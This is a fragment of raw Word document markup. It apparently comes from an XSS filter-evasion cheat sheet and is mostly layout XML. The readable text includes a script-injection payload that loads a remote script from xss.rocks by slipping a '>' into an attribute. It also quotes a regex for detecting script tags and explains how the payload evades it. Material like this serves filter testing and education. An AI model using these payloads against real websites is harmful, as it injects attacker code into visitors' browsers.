                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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"a='&gt;'"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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3"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102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76608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2606675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2886075" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="570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6075" cy="116205"/>
                          <a:chOff x="4105" y="108"/>
                          <a:chExt cx="4545" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="571" name="Freeform 573"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4105" y="108"/>
                            <a:ext cx="4545" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8628 4105"/>
                              <a:gd name="T1" fmla="*/ T0 w 4545"/>
                              <a:gd name="T2" fmla="+- 0 290 108"/>
                              <a:gd name="T3" fmla="*/ 290 h 183"/>
                              <a:gd name="T4" fmla="+- 0 4126 4105"/>
                              <a:gd name="T5" fmla="*/ T4 w 4545"/>
                              <a:gd name="T6" fmla="+- 0 290 108"/>
                              <a:gd name="T7" fmla="*/ 290 h 183"/>
                              <a:gd name="T8" fmla="+- 0 4123 4105"/>
                              <a:gd name="T9" fmla="*/ T8 w 4545"/>
                              <a:gd name="T10" fmla="+- 0 290 108"/>
                              <a:gd name="T11" fmla="*/ 290 h 183"/>
                              <a:gd name="T12" fmla="+- 0 4105 4105"/>
                              <a:gd name="T13" fmla="*/ T12 w 4545"/>
                              <a:gd name="T14" fmla="+- 0 269 108"/>
                              <a:gd name="T15" fmla="*/ 269 h 183"/>
                              <a:gd name="T16" fmla="+- 0 4105 4105"/>
                              <a:gd name="T17" fmla="*/ T16 w 4545"/>
                              <a:gd name="T18" fmla="+- 0 266 108"/>
                              <a:gd name="T19" fmla="*/ 266 h 183"/>
                              <a:gd name="T20" fmla="+- 0 4105 4105"/>
                              <a:gd name="T21" fmla="*/ T20 w 4545"/>
                              <a:gd name="T22" fmla="+- 0 129 108"/>
                              <a:gd name="T23" fmla="*/ 129 h 183"/>
                              <a:gd name="T24" fmla="+- 0 4126 4105"/>
                              <a:gd name="T25" fmla="*/ T24 w 4545"/>
                              <a:gd name="T26" fmla="+- 0 108 108"/>
                              <a:gd name="T27" fmla="*/ 108 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8628 4105"/>
                              <a:gd name="T29" fmla="*/ T28 w 4545"/>
                              <a:gd name="T30" fmla="+- 0 108 108"/>
                              <a:gd name="T31" fmla="*/ 108 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8649 4105"/>
                              <a:gd name="T33" fmla="*/ T32 w 4545"/>
                              <a:gd name="T34" fmla="+- 0 129 108"/>
                              <a:gd name="T35" fmla="*/ 129 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8649 4105"/>
                              <a:gd name="T37" fmla="*/ T36 w 4545"/>
                              <a:gd name="T38" fmla="+- 0 269 108"/>
                              <a:gd name="T39" fmla="*/ 269 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8631 4105"/>
                              <a:gd name="T41" fmla="*/ T40 w 4545"/>
                              <a:gd name="T42" fmla="+- 0 290 108"/>
                              <a:gd name="T43" fmla="*/ 290 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8628 4105"/>
                              <a:gd name="T45" fmla="*/ T44 w 4545"/>
                              <a:gd name="T46" fmla="+- 0 290 108"/>
                              <a:gd name="T47" fmla="*/ 29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45" h="183">
                                <a:moveTo>
                                  <a:pt x="452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523" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4544" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4544" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4526" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="452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Text Box 572"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4105" y="108"/>
                            <a:ext cx="454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8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/\&lt;script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\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1" o:spid="_x0000_s1857" style="position:absolute;left:0;text-align:left;margin-left:205.25pt;margin-top:5.4pt;width:227.25pt;height:9.15pt;z-index:15876608;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="4105,108" coordsize="454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">
                <v:shape id="Freeform 573" o:spid="_x0000_s1858" style="position:absolute;left:4105;top:108;width:4545;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="454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pZsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPUWvCMBSF3wf+h3AHvoyZKptKZ1pEGA4GA6s/4NLc&#10;tcXkpiRZW/+9GQz2eDjnfIezKydrxEA+dI4VLBcZCOLa6Y4bBZfz+/MWRIjIGo1jUnCjAGUxe9hh&#10;rt3IJxqq2IgE4ZCjgjbGPpcy1C1ZDAvXEyfv23mLMUnfSO1xTHBr5CrL1tJix2mhxZ4OLdXX6scq&#10;+Dy+ZNdq/XWK5mZ8bQ/hydBWqfnjtH8DEWmK/+G/9odW8LpZwu+ZdAR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s6WbEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m4523,182l21,182r-3,l,161r,-3l,21,21,,4523,r21,21l4544,161r-18,21l4523,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4523,290;21,290;18,290;0,269;0,266;0,129;21,108;4523,108;4544,129;4544,269;4526,290;4523,290" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 572" o:spid="_x0000_s1859" type="#_x0000_t202" style="position:absolute;left:4105;top:108;width:454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m1Z8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pf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m1Z8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8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/\&lt;script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\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And</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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last</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack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evade,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="3133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77120" behindDoc="0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51435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1867535" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="567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7535" cy="116205"/>
                          <a:chOff x="1614" y="81"/>
                          <a:chExt cx="2941" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="568" name="Freeform 570"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="81"/>
                            <a:ext cx="2941" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4534 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2941"/>
                              <a:gd name="T2" fmla="+- 0 263 81"/>
                              <a:gd name="T3" fmla="*/ 263 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2941"/>
                              <a:gd name="T6" fmla="+- 0 263 81"/>
                              <a:gd name="T7" fmla="*/ 263 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2941"/>
                              <a:gd name="T10" fmla="+- 0 263 81"/>
                              <a:gd name="T11" fmla="*/ 263 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2941"/>
                              <a:gd name="T14" fmla="+- 0 242 81"/>
                              <a:gd name="T15" fmla="*/ 242 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2941"/>
                              <a:gd name="T18" fmla="+- 0 239 81"/>
                              <a:gd name="T19" fmla="*/ 239 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2941"/>
                              <a:gd name="T22" fmla="+- 0 102 81"/>
                              <a:gd name="T23" fmla="*/ 102 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2941"/>
                              <a:gd name="T26" fmla="+- 0 81 81"/>
                              <a:gd name="T27" fmla="*/ 81 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4534 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2941"/>
                              <a:gd name="T30" fmla="+- 0 81 81"/>
                              <a:gd name="T31" fmla="*/ 81 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4555 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2941"/>
                              <a:gd name="T34" fmla="+- 0 102 81"/>
                              <a:gd name="T35" fmla="*/ 102 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4555 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2941"/>
                              <a:gd name="T38" fmla="+- 0 242 81"/>
                              <a:gd name="T39" fmla="*/ 242 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4537 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2941"/>
                              <a:gd name="T42" fmla="+- 0 263 81"/>
                              <a:gd name="T43" fmla="*/ 263 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4534 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2941"/>
                              <a:gd name="T46" fmla="+- 0 263 81"/>
                              <a:gd name="T47" fmla="*/ 26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941" h="183">
                                <a:moveTo>
                                  <a:pt x="29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920" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2941" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2941" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2923" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29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Text Box 569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81"/>
                            <a:ext cx="294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[^'"\&gt;\\s\]+))?)+\\s\*|\\s\*)src/i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8" o:spid="_x0000_s1860" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:4.05pt;width:147.05pt;height:9.15pt;z-index:15877120;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,81" coordsize="294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">
                <v:shape id="Freeform 570" o:spid="_x0000_s1861" style="position:absolute;left:1614;top:81;width:2941;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="294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EDOsMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m6kDRapRRBwM2WGzAz0+m2db&#10;bV66JK3tf78cBjt+fL9Xm97UoiPnK8sKppMEBHFudcWFgu/s7WUBwgdkjbVlUjCQh8169LTCVNsH&#10;f1F3DIWIIexTVFCG0KRS+rwkg35iG+LIXa0zGCJ0hdQOHzHc1PI1SebSYMWxocSGdiXl92NrFPyc&#10;2y4fsuG0yOr9pb19nNzhk5V6HvfbJYhAffgX/7nftYLZPK6NZ+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4EDOsMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m2920,182l21,182r-3,l,161r,-3l,21,21,,2920,r21,21l2941,161r-18,21l2920,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2920,263;21,263;18,263;0,242;0,239;0,102;21,81;2920,81;2941,102;2941,242;2923,263;2920,263" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 569" o:spid="_x0000_s1862" type="#_x0000_t202" style="position:absolute;left:1614;top:81;width:294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Sxy8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/KE3nSj0FBTV5GiIBSKMR48vmaf&#10;yWL2bcyumv77rlDwOMzMN8x82dtG3KjzxrGCyTgBQVw6bbhScCg2o3cQPiBrbByTgl/ysFy8DOaY&#10;aXfnnG77UIkIYZ+hgjqENpPSlzVZ9GPXEkfv5DqLIcqukrrDe4TbRk6TJJUWDceFGlv6rKk8769W&#10;werI+dpcvn92+Sk3RTFL+Cs9K/U67FcfIAL14Rn+b2+1grd0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tLHL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[^'"\&gt;\\s\]+))?)+\\s\*|\\s\*)src/i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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>grave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>accents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(again,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>work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Firefox):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="101"/>
        <w:ind w:left="190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:sz w:val="15"/>
        </w:rPr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77536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67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="566" name="Freeform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120" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 2505 1614"/>
                            <a:gd name="T1" fmla="*/ T0 w 912"/>
                            <a:gd name="T2" fmla="+- 0 289 107"/>
                            <a:gd name="T3" fmla="*/ 289 h 183"/>
                            <a:gd name="T4" fmla="+- 0 1635 1614"/>
                            <a:gd name="T5" fmla="*/ T4 w 912"/>
                            <a:gd name="T6" fmla="+- 0 289 107"/>
                            <a:gd name="T7" fmla="*/ 289 h 183"/>
                            <a:gd name="T8" fmla="+- 0 1632 1614"/>
                            <a:gd name="T9" fmla="*/ T8 w 912"/>
                            <a:gd name="T10" fmla="+- 0 289 107"/>
                            <a:gd name="T11" fmla="*/ 289 h 183"/>
                            <a:gd name="T12" fmla="+- 0 1614 1614"/>
                            <a:gd name="T13" fmla="*/ T12 w 912"/>
                            <a:gd name="T14" fmla="+- 0 268 107"/>
                            <a:gd name="T15" fmla="*/ 268 h 183"/>
                            <a:gd name="T16" fmla="+- 0 1614 1614"/>
                            <a:gd name="T17" fmla="*/ T16 w 912"/>
                            <a:gd name="T18" fmla="+- 0 265 107"/>
                            <a:gd name="T19" fmla="*/ 265 h 183"/>
                            <a:gd name="T20" fmla="+- 0 1614 1614"/>
                            <a:gd name="T21" fmla="*/ T20 w 912"/>
                            <a:gd name="T22" fmla="+- 0 128 107"/>
                            <a:gd name="T23" fmla="*/ 128 h 183"/>
                            <a:gd name="T24" fmla="+- 0 1635 1614"/>
                            <a:gd name="T25" fmla="*/ T24 w 912"/>
                            <a:gd name="T26" fmla="+- 0 107 107"/>
                            <a:gd name="T27" fmla="*/ 107 h 183"/>
                            <a:gd name="T28" fmla="+- 0 2505 1614"/>
                            <a:gd name="T29" fmla="*/ T28 w 912"/>
                            <a:gd name="T30" fmla="+- 0 107 107"/>
                            <a:gd name="T31" fmla="*/ 107 h 183"/>
                            <a:gd name="T32" fmla="+- 0 2526 1614"/>
                            <a:gd name="T33" fmla="*/ T32 w 912"/>
                            <a:gd name="T34" fmla="+- 0 128 107"/>
                            <a:gd name="T35" fmla="*/ 128 h 183"/>
                            <a:gd name="T36" fmla="+- 0 2526 1614"/>
                            <a:gd name="T37" fmla="*/ T36 w 912"/>
                            <a:gd name="T38" fmla="+- 0 268 107"/>
                            <a:gd name="T39" fmla="*/ 268 h 183"/>
                            <a:gd name="T40" fmla="+- 0 2508 1614"/>
                            <a:gd name="T41" fmla="*/ T40 w 912"/>
                            <a:gd name="T42" fmla="+- 0 289 107"/>
                            <a:gd name="T43" fmla="*/ 289 h 183"/>
                            <a:gd name="T44" fmla="+- 0 2505 1614"/>
                            <a:gd name="T45" fmla="*/ T44 w 912"/>
                            <a:gd name="T46" fmla="+- 0 289 107"/>
                            <a:gd name="T47" fmla="*/ 289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12" h="183">
                              <a:moveTo>
                                <a:pt x="891" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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891" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="912" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="912" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="894" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="891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DB8D2" id="Freeform 567" o:spid="_x0000_s1026" style="position:absolute;margin-left:80.7pt;margin-top:5.35pt;width:45.6pt;height:9.15pt;z-index:-1754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" path="m891,182r-870,l18,182,,161r,-3l,21,21,,891,r21,21l912,161r-18,21l891,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="565785,183515;13335,183515;11430,183515;0,170180;0,168275;0,81280;13335,67945;565785,67945;579120,81280;579120,170180;567690,183515;565785,183515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775872" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1657985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2137410" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="565" name="Freeform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37410" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 5955 2611"/>
                            <a:gd name="T1" fmla="*/ T0 w 3366"/>
                            <a:gd name="T2" fmla="+- 0 289 107"/>
                            <a:gd name="T3" fmla="*/ 289 h 183"/>
                            <a:gd name="T4" fmla="+- 0 2632 2611"/>
                            <a:gd name="T5" fmla="*/ T4 w 3366"/>
                            <a:gd name="T6" fmla="+- 0 289 107"/>
                            <a:gd name="T7" fmla="*/ 289 h 183"/>
                            <a:gd name="T8" fmla="+- 0 2629 2611"/>
                            <a:gd name="T9" fmla="*/ T8 w 3366"/>
                            <a:gd name="T10" fmla="+- 0 289 107"/>
                            <a:gd name="T11" fmla="*/ 289 h 183"/>
                            <a:gd name="T12" fmla="+- 0 2611 2611"/>
                            <a:gd name="T13" fmla="*/ T12 w 3366"/>
                            <a:gd name="T14" fmla="+- 0 268 107"/>
                            <a:gd name="T15" fmla="*/ 268 h 183"/>
                            <a:gd name="T16" fmla="+- 0 2611 2611"/>
                            <a:gd name="T17" fmla="*/ T16 w 3366"/>
                            <a:gd name="T18" fmla="+- 0 265 107"/>
                            <a:gd name="T19" fmla="*/ 265 h 183"/>
                            <a:gd name="T20" fmla="+- 0 2611 2611"/>
                            <a:gd name="T21" fmla="*/ T20 w 3366"/>
                            <a:gd name="T22" fmla="+- 0 128 107"/>
                            <a:gd name="T23" fmla="*/ 128 h 183"/>
                            <a:gd name="T24" fmla="+- 0 2632 2611"/>
                            <a:gd name="T25" fmla="*/ T24 w 3366"/>
                            <a:gd name="T26" fmla="+- 0 107 107"/>
                            <a:gd name="T27" fmla="*/ 107 h 183"/>
                            <a:gd name="T28" fmla="+- 0 5955 2611"/>
                            <a:gd name="T29" fmla="*/ T28 w 3366"/>
                            <a:gd name="T30" fmla="+- 0 107 107"/>
                            <a:gd name="T31" fmla="*/ 107 h 183"/>
                            <a:gd name="T32" fmla="+- 0 5976 2611"/>
                            <a:gd name="T33" fmla="*/ T32 w 3366"/>
                            <a:gd name="T34" fmla="+- 0 128 107"/>
                            <a:gd name="T35" fmla="*/ 128 h 183"/>
                            <a:gd name="T36" fmla="+- 0 5976 2611"/>
                            <a:gd name="T37" fmla="*/ T36 w 3366"/>
                            <a:gd name="T38" fmla="+- 0 268 107"/>
                            <a:gd name="T39" fmla="*/ 268 h 183"/>
                            <a:gd name="T40" fmla="+- 0 5958 2611"/>
                            <a:gd name="T41" fmla="*/ T40 w 3366"/>
                            <a:gd name="T42" fmla="+- 0 289 107"/>
                            <a:gd name="T43" fmla="*/ 289 h 183"/>
                            <a:gd name="T44" fmla="+- 0 5955 2611"/>
                            <a:gd name="T45" fmla="*/ T44 w 3366"/>
                            <a:gd name="T46" fmla="+- 0 289 107"/>
                            <a:gd name="T47" fmla="*/ 289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3366" h="183">
                              <a:moveTo>
                                <a:pt x="3344" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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3344" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3365" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3365" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3347" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3344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5BC7EE" id="Freeform 566" o:spid="_x0000_s1026" style="position:absolute;margin-left:130.55pt;margin-top:5.35pt;width:168.3pt;height:9.15pt;z-index:-1754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6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" path="m3344,182l21,182r-3,l,161r,-3l,21,21,,3344,r21,21l3365,161r-18,21l3344,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2123440,183515;13335,183515;11430,183515;0,170180;0,168275;0,81280;13335,67945;2123440,67945;2136775,81280;2136775,170180;2125345,183515;2123440,183515" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:w w:val="90"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>&lt;SCRIPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="64"/>
          <w:w w:val="90"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:w w:val="90"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>a=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-20"/>
          <w:w w:val="90"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="90"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="90"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:w w:val="90"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>SRC="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:w w:val="90"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Here's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>example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bets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fact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regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>won't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>catch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matching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>pair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quotes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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rather</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotes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terminate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parameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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improperly: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2812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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2994025" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="562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025" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="4715" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="563" name="Freeform 565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4715" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6308 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4715"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
